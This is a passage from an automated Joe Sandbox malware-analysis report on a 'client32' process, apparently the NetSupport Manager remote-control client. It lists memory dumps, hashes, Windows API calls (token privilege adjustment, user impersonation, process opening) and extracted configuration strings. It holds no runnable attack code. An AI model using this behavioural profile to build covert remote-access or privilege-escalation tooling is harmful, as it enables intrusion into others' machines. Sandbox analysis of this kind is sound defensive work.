                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InformationToken$AllocateEqualInitialize
                                                                                  • String ID:
                                                                                  • API String ID: 1878589025-0
                                                                                  • Opcode ID: 4b61cf4af713a4b82f6fb566942020194785977790fe51c73b26fe6fb189ff5a
                                                                                  • Instruction ID: f2a8bc8f74b1de347afb3cb87d534257ea472b44b3b43d4353705adbfce15ac3
                                                                                  • Opcode Fuzzy Hash: 4b61cf4af713a4b82f6fb566942020194785977790fe51c73b26fe6fb189ff5a
                                                                                  • Instruction Fuzzy Hash: DF213031B0122EABEB10DA98DD95BFEB7B8EB44704F014169E929DB180E671AD10D791
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(000F01FF,?,11030703,00000000,00000000,00080000,50D94AA1,00080000,00000000,?), ref: 1109D88D
                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 1109D894
                                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D8A5
                                                                                  • AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D8C9
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                  • String ID:
                                                                                  • API String ID: 2349140579-0
                                                                                  • Opcode ID: b1ebb33d0097c2b27741ff61215e6ff8e180ff04b55af2e4c570c349c4c69e7c
                                                                                  • Instruction ID: 81f12928af7d2c66371a758247fa27ee71cd04b85772abc6619dfc746b0a2552
                                                                                  • Opcode Fuzzy Hash: b1ebb33d0097c2b27741ff61215e6ff8e180ff04b55af2e4c570c349c4c69e7c
                                                                                  • Instruction Fuzzy Hash: 4F018CB2640218ABE710DFA4CD89BABF7BCEB04705F004429E91597280D7B06904CBB0
                                                                                  APIs
                                                                                  • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109EC30,00000244,cant create events), ref: 1109D90C
                                                                                  • CloseHandle.KERNEL32(?,00000000,1109EC30,00000244,cant create events), ref: 1109D915
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                                                  • String ID:
                                                                                  • API String ID: 81990902-0
                                                                                  • Opcode ID: 7d88282d2466d0bea445bfa4253874e9d1aaaebadf3be96b3f697e0eef8d2738
                                                                                  • Instruction ID: 1087c1a68057020919897756081cb42e4a012b8ce4d03b8cf520615490e2fd10
                                                                                  • Opcode Fuzzy Hash: 7d88282d2466d0bea445bfa4253874e9d1aaaebadf3be96b3f697e0eef8d2738
                                                                                  • Instruction Fuzzy Hash: 3CE08C30280214ABE338DE24AD90FA673EDAF05B04F11092DF8A6D2580CA60E8008B60
                                                                                  APIs
                                                                                    • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                    • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                    • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                  • GetSystemMetrics.USER32(00002000), ref: 1102ED54
                                                                                  • FindWindowA.USER32(NSMWClass,00000000), ref: 1102EF15
                                                                                    • Part of subcall function 11110DE0: GetCurrentThreadId.KERNEL32 ref: 11110E76
                                                                                    • Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
                                                                                    • Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(111F18F0,?,11031700,00000001,00000000), ref: 11110E98
                                                                                    • Part of subcall function 11110DE0: EnterCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110EAC
                                                                                    • Part of subcall function 11110DE0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2
                                                                                  • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102EF4B
                                                                                  • OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102EF6D
                                                                                  • IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102F22F
                                                                                    • Part of subcall function 11094F00: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102EF9C,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F1C
                                                                                    • Part of subcall function 11094F00: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102EF9C,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F29
                                                                                    • Part of subcall function 11094F00: CloseHandle.KERNEL32(00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F59
                                                                                  • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102EFCC
                                                                                  • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102EFD8
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 1102EFF0
                                                                                  • FindWindowA.USER32(NSMWClass,00000000), ref: 1102EFFD
                                                                                  • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102F019
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102ED86
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  • IsJPIK.PCICHEK(?,?,?,View,Client,Bridge), ref: 1102F3ED
                                                                                  • LoadIconA.USER32(11000000,000004C1), ref: 1102F521
                                                                                  • LoadIconA.USER32(11000000,000004C2), ref: 1102F531
                                                                                  • DestroyCursor.USER32(00000000), ref: 1102F557
                                                                                  • DestroyCursor.USER32(00000000), ref: 1102F568
                                                                                    • Part of subcall function 11028360: ImpersonateLoggedOnUser.ADVAPI32(00000000), ref: 110283A3
                                                                                    • Part of subcall function 11028360: GetUserNameA.ADVAPI32(?,?), ref: 110283BC
                                                                                    • Part of subcall function 11028360: RevertToSelf.ADVAPI32 ref: 110283DC
                                                                                    • Part of subcall function 11028360: CloseHandle.KERNEL32(00000000), ref: 110283E3
                                                                                  • GetVersion.KERNEL32(?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client,Bridge), ref: 1102FB05
                                                                                  • GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client), ref: 1102FB58
                                                                                  • Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000), ref: 110300F2
                                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1103012C
                                                                                  • DispatchMessageA.USER32(?), ref: 11030136
                                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 11030148
                                                                                  • CloseHandle.KERNEL32(00000000,Function_000278D0,00000001,00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 110303D4
                                                                                  • GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1103040C
                                                                                  • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000), ref: 11030413
                                                                                  • SetWindowPos.USER32(0006040E,000000FF,00000000,00000000,00000000,00000000,00000013,Client,AlwaysOnTop,00000000,00000000), ref: 11030449
                                                                                  • CloseHandle.KERNEL32(00000000,1105A720,00000001,00000000,?,?,?,?,?,?,?,?,00000000), ref: 110304CA
                                                                                    • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                  • wsprintfA.USER32 ref: 11030645
                                                                                    • Part of subcall function 11129040: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,50D94AA1,?,?,00000000), ref: 1112909A
                                                                                    • Part of subcall function 11129040: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 111290A7
                                                                                    • Part of subcall function 11129040: WaitForSingleObject.KERNEL32(00000006,000000FF,00000000,00000000), ref: 111290EE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                   • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process$CloseHandleMessageWindow$CreateEvent$CriticalOpenSectionThreadwsprintf$CurrentCursorDestroyFindIconInitializeLoadObjectPeekSingleTokenUserVersionWait$ClassDispatchEnterErrorExitImpersonateLastLoggedMetricsNamePriorityRevertSelfSendSleepSystem__wcstoi64_malloc_memset
                                                                                  • String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$648351$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$IKS.LIC$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$Intel(r)$IsILS returned %d, isvistaservice %d$IsJPIK returned %d, isvistaservice %d$JPK$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$Unsupported Platform$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.20$V12.10.20$View$Windows 10$Windows 10 x64$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 2016$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui
                                                                                  • API String ID: 372548862-2744211200
                                                                                  • Opcode ID: ff6231982a083b7ef807ca73d3ddae56e174acd57833a54bc83ec0c4d0681142
                                                                                  • Instruction ID: 381c96219eccee67eae21d9e39560490d5bedbb063d23e5a2fc42920cd5923e4
                                                                                  • Opcode Fuzzy Hash: ff6231982a083b7ef807ca73d3ddae56e174acd57833a54bc83ec0c4d0681142
                                                                                  • Instruction Fuzzy Hash: 39F2F978E0226A9FE715CBA0CC94FADF7A5BB4870CF504468F925B72C8DB706940CB56

                                                                                   Control-flow Graph (function starting at 1102e0d0; graph image and Executed / Not Executed legend not reproduced)
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                   • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _malloc_memsetwsprintf
                                                                                  • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$18/11/16 11:28:14 V12.10F20$648351$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                  • API String ID: 3802068140-3577953040
                                                                                  • Opcode ID: eeddba07d7e6520cef25e5c7574d70c0732ba69d7c4c0694e1ffbbd3a2b399ab
                                                                                  • Instruction ID: ec88a390f79512b50aba7168cc31da78705c53b3cca2911266f0d70c00f4e6f9
                                                                                  • Opcode Fuzzy Hash: eeddba07d7e6520cef25e5c7574d70c0732ba69d7c4c0694e1ffbbd3a2b399ab
                                                                                  • Instruction Fuzzy Hash: 8232B175D4127A9FDB22CF90CC84BEDB7B8BB44308F8445E9E559A7280EB706E84CB51

                                                                                   Control-flow Graph (function starting at 6fa03d00; graph image and Executed / Not Executed legend not reproduced)
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                   • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                   • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmp
                                                                                   • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmp
                                                                                   • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmp
                                                                                   • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                   • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID: *Dept$*Gsk$1.1$648351$A1=%s$A2=%s$A3=%s$A4=%s$APPTYPE=%d$CHATID$CHATID=%s$CLIENT_ADDR=%s$CLIENT_NAME=%s$CLIENT_VERSION=1.0$CMD=OPEN$CMPI=%u$DEPT=%s$GSK=%s$HOSTNAME=%s$ListenPort$MAXPACKET=%d$PORT=%d$PROTOCOL_VER=%u.%u$Port$TCPIP$client247$connection_index == 0$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c
                                                                                  • API String ID: 2102423945-1719263116
                                                                                  • Opcode ID: da51b6b0265a493285fba39d4f561e1b49fe14d7c54678a75ddbeb147747c34c
                                                                                  • Instruction ID: 9bd5edf12af8e2b8587d26a9c76a9a3f37199746b2a1d7ab01113da4481ad58a
                                                                                  • Opcode Fuzzy Hash: da51b6b0265a493285fba39d4f561e1b49fe14d7c54678a75ddbeb147747c34c
                                                                                  • Instruction Fuzzy Hash: C5E16372C007286ACB25DB64ED80FEFB778AF55219F0085D5E509A6181DB38ABC58FE1

                                                                                   Control-flow Graph (function starting at 11144140; graph image and Executed / Not Executed legend not reproduced)
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,762323A0), ref: 11144173
                                                                                  • LoadLibraryA.KERNEL32(?), ref: 111441BC
                                                                                  • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 111441D5
                                                                                  • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 111441E4
                                                                                  • GetModuleHandleA.KERNEL32(?), ref: 111441EA
                                                                                  • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 111441FE
                                                                                  • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1114421D
                                                                                  • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11144228
                                                                                  • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11144233
                                                                                  • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1114423E
                                                                                  • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11144249
                                                                                  • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11144254
                                                                                  • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1114425F
                                                                                  • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114426A
                                                                                  • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 11144275
                                                                                  • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 11144280
                                                                                  • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 1114428B
                                                                                  • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 11144296
                                                                                  • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 111442A1
                                                                                  • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111442AC
                                                                                    • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                   • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
                                                                                  • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
                                                                                  • API String ID: 3874234733-2061581830
                                                                                  • Opcode ID: 57b4066cb2a569ca058a5d5f8073bc193ef12f36e95607c0665d50404da9b0c4
                                                                                  • Instruction ID: c7cebb5ad097969c59afa36c8b157edb2e0deacaa1fcee2d42955e2ce7c14d1b
                                                                                  • Opcode Fuzzy Hash: 57b4066cb2a569ca058a5d5f8073bc193ef12f36e95607c0665d50404da9b0c4
                                                                                  • Instruction Fuzzy Hash: 74416174A40704AFDB289F769D84E6BFBF8FF55B18B50492EE445D3A00EB74E8008B59

                                                                                  Control-flow Graph
                                                                                  • Rendered graph not reproduced; root block 110aa170-110aa1d2 (LoadLibraryA, GetProcAddress), raw edge list omitted
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(setupapi.dll,50D94AA1,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000,111856D8), ref: 110AA1A3
                                                                                  • GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsA), ref: 110AA1C7
                                                                                  • SetupDiGetClassDevsA.SETUPAPI(111A7EDC,00000000,00000000,00000012,?,?,?,?,?,?,?,?,?,00000000,111856D8,000000FF), ref: 110AA1E1
                                                                                  • GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInterfaces), ref: 110AA20C
                                                                                  • _free.LIBCMT ref: 110AA240
                                                                                  • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110AA252
                                                                                  • GetLastError.KERNEL32 ref: 110AA27D
                                                                                  • _malloc.LIBCMT ref: 110AA293
                                                                                  • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110AA2B5
                                                                                  • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,00000000,111856D8,000000FF,?,1102F855,Client), ref: 110AA2E7
                                                                                  • SetLastError.KERNEL32(00000078), ref: 110AA2FB
                                                                                  • GetLastError.KERNEL32 ref: 110AA301
                                                                                  • _free.LIBCMT ref: 110AA313
                                                                                  • SetLastError.KERNEL32(00000078), ref: 110AA324
                                                                                  • SetLastError.KERNEL32(00000078), ref: 110AA331
                                                                                  • _free.LIBCMT ref: 110AA344
                                                                                  • FreeLibrary.KERNEL32(?,?), ref: 110AA354
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,111856D8,000000FF,?,1102F855,Client), ref: 110AA3F8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
